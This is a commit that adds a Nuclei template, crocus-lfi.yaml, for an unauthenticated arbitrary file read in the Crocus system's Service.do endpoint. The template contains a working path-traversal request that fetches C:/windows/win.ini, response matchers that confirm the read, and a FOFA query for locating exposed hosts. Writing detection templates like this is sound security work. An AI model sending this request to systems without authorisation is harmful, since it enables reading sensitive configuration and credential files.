Merge pull request #10190 from projectdiscovery/pussycat0x-patch-7

Create crocus-lfi.yaml
2024-07-04 16:06:55 +05:30 · 2024-07-04 16:06:55 +05:30 · 7fb04bafec
parent 1001875940 017304cd42
commit 7fb04bafec
1 changed files with 36 additions and 0 deletions
--- a/http/vulnerabilities/other/crocus-lfi.yaml
+++ b/http/vulnerabilities/other/crocus-lfi.yaml
@ -0,0 +1,36 @@
+id: crocus-lfi
+
+info:
+  name: Crocus system Service.do  - Arbitrary File Read
+  author: pussycat0x
+  severity: high
+  description: |
+    There is an arbitrary file reading vulnerability in the Service.do interface of Ruiming Technology's Crocus system. An unauthenticated remote attacker can use this vulnerability to read important system files (such as database configuration files, system configuration files), database configuration files, etc. This leaves the website in an extremely unsafe state.
+  reference:
+    - https://github.com/wy876/POC/blob/main/%E9%94%90%E6%98%8E%E6%8A%80%E6%9C%AFCrocus%E7%B3%BB%E7%BB%9FService.do%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: body="/ThirdResource/respond/respond.min.js" && title="Crocus"
+  tags: crocus,lfi
+
+http:
+  - raw:
+      - |
+        GET /Service.do?Action=Download&Path=C:/windows/win.ini HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "bit app support"
+          - "fonts"
+          - "extensions"
+        condition: and
+
+      - type: status
+        status:
+          - 200